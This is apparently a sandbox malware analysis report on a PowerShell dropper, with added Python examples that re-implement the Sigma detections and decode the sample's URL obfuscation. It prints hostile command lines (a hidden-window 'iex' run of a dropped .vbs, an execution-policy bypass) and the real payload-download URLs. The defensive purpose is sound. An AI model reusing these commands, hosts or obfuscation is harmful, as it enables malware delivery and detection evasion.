
Windows Analysis Report
gCXzb0K8Ci.ps1

Overview

General Information

Sample name: gCXzb0K8Ci.ps1 (renamed because the original name is a hash value)
Original sample name: d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24.ps1
Analysis ID: 1578233
MD5: f66c1baa8805a9f3d84f0d7b253b62b0
SHA1: 482e3694cd0de951055dc9c58af3c351fb8a5a78
SHA256: d4e49fb44f2d9c6b2626e82bfbded73e771f55e506618c5a2b47afbcf218bc24
Tags: 185-236-228-92, 87-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 2696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 6176 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 2724 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 6668 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1528,i,9795832297208486948,11593460872991007467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 2696 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_2696.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2696, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'", ProcessId: 6392, ProcessName: powershell.exe
      Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2696, TargetFilename: C:\Users\Public\v49.vbs
      Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", ProcessId: 2696, ProcessName: powershell.exe
      Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2696, TargetFilename: C:\Users\Public\v49.vbs
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1", ProcessId: 2696, ProcessName: powershell.exe
      Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 320, ProcessName: svchost.exe
      No Suricata rule has matched
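      The Sigma hits above can be reproduced from the event fields alone. The following is an added example, not part of the Joe Sandbox report and not the upstream Sigma rules' exact logic: a simplified Python re-implementation of the core condition of each of the four rules, run over process-creation and file-creation events reconstructed from this report's process tree and Sigma data. The svchost.exe BITS process and PowerShell's own __PSScriptPolicyTest_ file are included as controls that must not fire; the suspicious-directory list, the dropped-extension list and the regexes are this example's choices.

```python
"""Simplified re-implementation of the four Sigma conditions the report lists,
run over events rebuilt from the report's own process tree and Sigma data.

Added example; this is neither the sandbox's nor the upstream Sigma rules'
exact logic, only the core condition of each rule so the hits can be traced
to specific fields. Rule names are the report's signature titles.
"""
import re

# Process-creation events (values copied from the report; svchost is a control).
PROCESS_EVENTS = [
    {"ProcessId": 2696,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gCXzb0K8Ci.ps1"'''},
    {"ProcessId": 6392,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"'''},
    {"ProcessId": 320,
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"},
]

# File-creation events (Sysmon EventID 11). The second is PowerShell's own
# execution-policy probe file and must not fire the dropper rule.
FILE_EVENTS = [
    {"ProcessId": 2696,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\Public\v49.vbs"},
    {"ProcessId": 2696,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxcmyagf.cl0.ps1"},
]

POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")
SHELL_HOSTS = POWERSHELL + ("\\cmd.exe", "\\wscript.exe", "\\cscript.exe", "\\mshta.exe")
# "-ExecutionPolicy" may be abbreviated to any unambiguous prefix ("-ex", "-ep").
INSECURE_POLICY = re.compile(r"-(ep|ex[a-z]*)\s+(unrestricted|bypass)\b", re.I)
# Shortened parameter spellings that evade naive "-WindowStyle Hidden" matches.
SUSP_PARAM = re.compile(r"\s-(w|wi|win|windowst[a-z]*)\s+h(idden)?\b|\s-(nop|noni|ec|enc)\s", re.I)
# Directories a shell host has no ordinary reason to write scripts into
# (this list is the example's choice, not the upstream rule's).
SUSP_DIRS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\perflogs\\")
DROPPED_EXT = (".exe", ".dll", ".vbs", ".js", ".bat", ".cmd", ".hta", ".ps1")

RULE_POLICY = "Change PowerShell Policies to an Insecure Level"
RULE_PARAM = "Suspicious PowerShell Parameter Substring"
RULE_FOLDER = "Windows Shell/Scripting Application File Write to Suspicious Folder"
RULE_DROPPER = "Potential Binary Or Script Dropper Via PowerShell"


def image_is(image, names):
    """Case-insensitive match of the image path's file name against a tuple."""
    return image.lower().endswith(names)


def evaluate(process_events, file_events):
    """Return {rule name: [ProcessId or TargetFilename that matched]}."""
    hits = {RULE_POLICY: [], RULE_PARAM: [], RULE_FOLDER: [], RULE_DROPPER: []}
    for ev in process_events:
        if not image_is(ev["Image"], POWERSHELL):
            continue
        if INSECURE_POLICY.search(ev["CommandLine"]):
            hits[RULE_POLICY].append(ev["ProcessId"])
        if SUSP_PARAM.search(ev["CommandLine"]):
            hits[RULE_PARAM].append(ev["ProcessId"])
    for ev in file_events:
        target = ev["TargetFilename"]
        low = target.lower()
        if image_is(ev["Image"], SHELL_HOSTS) and low.startswith(SUSP_DIRS):
            hits[RULE_FOLDER].append(target)
        # PowerShell writes __PSScriptPolicyTest_*.ps1 itself on every start;
        # without this filter the dropper rule fires on every host.
        if (image_is(ev["Image"], POWERSHELL) and low.endswith(DROPPED_EXT)
                and "__psscriptpolicytest_" not in low):
            hits[RULE_DROPPER].append(target)
    return hits


if __name__ == "__main__":
    for rule, matched in evaluate(PROCESS_EVENTS, FILE_EVENTS).items():
        print(f"{rule}: {matched or 'no match'}")
```

      Run against the report's events, the policy rule fires on the parent (PID 2696, -ExecutionPolicy unrestricted), the parameter-substring rule on the child (PID 6392, -win hidden), and both file rules on C:\Users\Public\v49.vbs; the BITS svchost and the policy-test file produce nothing.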


      AV Detection

      Source: gCXzb0K8Ci.ps1 | Avira: detected
      Source: gCXzb0K8Ci.ps1 | ReversingLabs: Detection: 34%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.3% probability
      Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: Binary string: ystem.pdbm source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2316431496.00000293F76E0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.2108563780.000001A0C0426000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7B29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2319308884.00000293F7A7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2105240541.000001A0C017E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdbH source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb3K source: powershell.exe, 00000003.00000002.2104667258.000001A0C0108000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbG source: powershell.exe, 00000000.00000002.2319308884.00000293F7AC0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2312456488.00000293F56F2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.pdbr source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp
      Source: global traffic | HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.astenterprises.com.pk | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1 | Host: www.bluemaxxlaser.com | Connection: Keep-Alive
      Source: Joe Sandbox View | IP Address: 203.175.174.69
      Source: Joe Sandbox View | IP Address: 107.161.23.150
      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 events)
      Source: global traffic | HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.astenterprises.com.pk | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1 | Host: www.bluemaxxlaser.com | Connection: Keep-Alive
      Source: global traffic | DNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global traffic | DNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 19 Dec 2024 11:51:23 GMT | Server: Apache | Content-Length: 315 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://astenterprises.com.pk
      Source: svchost.exe, 00000007.00000002.3274345952.0000028B56800000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.7.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AEF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.0000029381B28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381B28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2219015938.0000029380232000.00000004.00000800.00020000.00000000.sdmp, gCXzb0K8Ci.ps1 | String found in binary or memory: http://www.bluhwamaxxlashwar.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.2319223440.00000293F7970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.dr | String found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.2219015938.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A80D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
      Source: edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: svchost.exe, 00000007.00000003.2170632442.0000028B565C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A89D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A96FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082588505.000001A0A8B1A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2305313682.00000293901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2305313682.000002939006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2101629166.000001A0B813E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
      Source: qmgr.db.7.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.2219015938.0000029381AE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.2219015938.00000293811DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p
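      The memory strings above contain each download URL twice: once as it went on the wire (www.bluemaxxlaser.com, www.astenterprises.com.pk) and once as it sits in the script, with every "e" replaced by the token "hwa" (bluhwamaxxlashwar, asthwanthwarprishwas, rhwaquirhwad, ithwams, shwarvichwas). That is a single string substitution, which is why the plain URL only exists in memory after the script has run. The following is an added example, not part of the report or the sample; the substitution is inferred from the string pairs rather than read from the script, and the inference is written as a brute-force search so it can recover a different token from another sample's before/after pair. The second obfuscated string is truncated in the report (it ends in ".p") and is used exactly as the report shows it.

```python
"""Recover the download URLs from the obfuscated strings the report lists.

Added example, not part of the Joe Sandbox report or of the sample. The two
string pairs found in PowerShell memory (the dropper-script URL and the decoy
PDF URL) differ only by the token "hwa" standing in for every "e"; that
substitution is inferred here from the pairs, it is not read from the script.
"""
from urllib.parse import urlsplit

# Strings copied from the report's "String found in binary or memory" lines.
# The third one is truncated in the report (ends in ".p") and is kept as-is.
MEMORY_STRINGS = [
    "http://www.bluhwamaxxlashwar.com/ms/ms.vbs",
    "http://www.bluemaxxlaser.com/ms/ms.vbs",
    "https://www.asthwanthwarprishwas.com.pk/ms/List%20of%20rhwaquirhwad%20ithwams%20and%20shwarvichwas.p",
    "https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf",
]


def infer_substitution(plain, obfuscated, max_token=8):
    """Find (token, char) such that obfuscated.replace(token, char) == plain.

    Characters present in the plain string but absent from the obfuscated one
    are the only candidates for what was replaced; every substring of the
    obfuscated string up to max_token characters is tried as the token.
    Returns None when no single substitution explains the pair.
    """
    candidates = sorted(set(plain) - set(obfuscated))
    for char in candidates:
        for length in range(1, max_token + 1):
            for start in range(len(obfuscated) - length + 1):
                token = obfuscated[start:start + length]
                if obfuscated.replace(token, char) == plain:
                    return token, char
    return None


def decode(s, token="hwa", char="e"):
    """Undo the substitution. A genuine URL that happens to contain the token
    would be corrupted, so only apply this to strings known to be encoded."""
    return s.replace(token, char)


def extract_hosts(strings, token="hwa", char="e"):
    """Decode every string and return the sorted set of URL hosts named."""
    hosts = set()
    for s in strings:
        parts = urlsplit(decode(s, token, char))
        if parts.scheme in ("http", "https") and parts.hostname:
            hosts.add(parts.hostname)
    return sorted(hosts)


if __name__ == "__main__":
    print(infer_substitution(MEMORY_STRINGS[1], MEMORY_STRINGS[0]))
    for s in MEMORY_STRINGS:
        print(decode(s))
    print(extract_hosts(MEMORY_STRINGS))
```

      Decoding is idempotent on the already-plain strings because neither real host contains "hwa", so the same pass can be run over every string in the dump; the host list it yields matches the two DNS queries and the two HTTP GETs recorded in the network section.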
      Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49704 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engine | Classification label: mal84.evad.winPS1@20/59@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Desktop\List of Required items and services.pdf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxcmyagf.cl0.ps1
